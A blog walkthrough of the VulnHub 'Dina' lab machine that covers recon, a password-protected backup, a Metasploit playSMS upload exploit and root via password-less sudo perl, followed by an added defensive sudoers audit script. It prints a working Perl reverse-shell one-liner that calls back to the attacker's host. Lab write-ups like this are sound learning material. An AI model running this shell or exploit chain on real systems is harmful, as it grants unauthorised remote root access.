Dina 1.0.1 Walkthrough

Francisco Trindade
4 min read · Feb 7, 2019


Dina is a fun, easy vulnerable machine that can be found on VulnHub. Overall I quite enjoyed this box and would definitely recommend it to anyone who is learning, as I am.

Initial Recon

As I mentioned in a previous guide, I typically use arp-scan to find the machine. Starting off, I run nmap on the target; nothing interesting comes up except an Apache server running on port 80. Taking a look in Firefox, we find the site that is running.

Dina home webpage

Looking at the source code of the HTML page, we find that the “Submit Query” button sends a POST request to /ange1; however, the method attribute on the form appears to be misspelled.

Broken form method attribute

I go ahead and send a curl POST request with an empty body to /ange1, and only get back the listing of an empty directory.

Empty /ange1 directory

Oh well, it seems to be a dead end. My next standard step is to throw dirb at it with a few wordlists. Using directory-list-2.3-small.txt from the dirbuster wordlist directory, we get a few interesting results back.

dirb results

Taking a look into /uploads and /tmp, we find nothing but empty directories. However, going into /secure we find an interesting file we can download, called backup.zip.

Listing of /secure

I download it; we will return to it later. Then I take a look into /nothing and get greeted with a cheeky webpage. However, checking out /nothing/pass we get some potential passwords!

HTML page of /nothing/pass

Local Work

Attempting to unzip backup.zip fails; it appears that the archive is password protected. Running 7z e backup.zip, we get a password prompt. Using the password list previously found at /nothing/pass, we attempt to open it. On the first try, it looks like the password “freedom” did the trick.

Unpacking of backup.zip

Trying to open the .mp3 file, we find that something is very wrong with it. I cat out the file and it looks to be a text file renamed to .mp3.

cat of backup-cred.mp3

This file reveals a new URL to investigate and a potential username/password login for something.

Getting a Shell

Heading over to /SecreTSMSgatwayLogin, we seem to find a playSMS service running.

playSMS login

The backup-cred.mp3 file seems to indicate that the password is 6 characters long, but before we try any crazy brute-forcing, let us try some of those other passwords I found earlier. Trying them out sequentially, we quickly find that “diana” logs me in.

playSMS after login

I trudge around here for a while, noting that I could potentially inject HTML into the page (XSS?), but nothing seems to work. Then I decide to take a peek at Metasploit and see if there are any vulnerabilities associated with playSMS.

Metasploit playSMS vulnerabilities

Looks like we got some hits. During my poking around earlier I noted that there was an ability to upload CSVs, so let us try the CSV upload attack.

Configuration for Metasploit attack

I ran the exploit and we get greeted with a shell.

Successful exploit

Side note: this is a Meterpreter shell. To get into a normal shell, I used the following sequence of commands.

meterpreter > shell
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Dina:/var/www$ export TERM=xterm

Privilege Escalation

At first I thought the older kernel version might be vulnerable, but nothing really worked. Afterwards I followed a checklist, which said to run sudo -l and see if there is anything you can run without a password.

Output of sudo -l

Interesting: I can run Perl as sudo without a password. Doing some investigation online, I find the following Perl one-liner for a reverse shell.

perl -e 'use Socket;$i="192.168.1.167";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

After changing the IP and port in the above script, I set up Netcat in my local terminal and ran the script with sudo from the user shell, and we get root!

cat out of /root/flag.txt
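The root cause of this escalation is a sudoers rule that lets an unprivileged account run an interpreter without a password. As an added example (not code from the original post), here is a small audit script a defender could run over /etc/sudoers to flag exactly that class of misconfiguration; the sample sudoers text and the www-data/perl rule in it are constructed assumptions, since the walkthrough only shows the sudo -l output as a screenshot.

```python
import re

# Binaries that can spawn an arbitrary shell when run under sudo: a NOPASSWD
# rule on any of them (or on ALL) is effectively a password-less root shell.
SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby", "php", "sh",
                 "bash", "zsh", "vi", "vim", "less", "more", "find", "awk", "env"}

# Matches "user host=(runas) TAG: cmd, cmd"; Defaults and alias lines are skipped.
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)"
                     r"(?P<cmds>.+)$")

def parse_rule(line):
    """Return (user, runas, tags, commands) for one sudoers rule, else None."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias")):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return m.group("who"), m.group("runas") or "root", tags, cmds

def risky_rules(sudoers_text):
    """List (user, runas, cmd) for NOPASSWD rules on a shell-capable binary or ALL."""
    findings = []
    for line in sudoers_text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        who, runas, tags, cmds = parsed
        if "NOPASSWD" not in tags:
            continue
        for cmd in cmds:
            binary = cmd.split()[0].rsplit("/", 1)[-1]  # drop path and arguments
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append((who, runas, cmd))
    return findings

# Constructed sample, not the box's real /etc/sudoers; the www-data/perl rule is
# an assumption mirroring the sudo -l finding in the walkthrough.
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/perl
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
alice    ALL=(ALL) /usr/bin/perl
"""
```

Running risky_rules(SAMPLE_SUDOERS) flags only the www-data/perl rule: the rsync rule grants no shell and alice's perl rule still requires a password. The fix on a real host is to drop the NOPASSWD tag or restrict the rule to a specific script rather than the interpreter itself.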

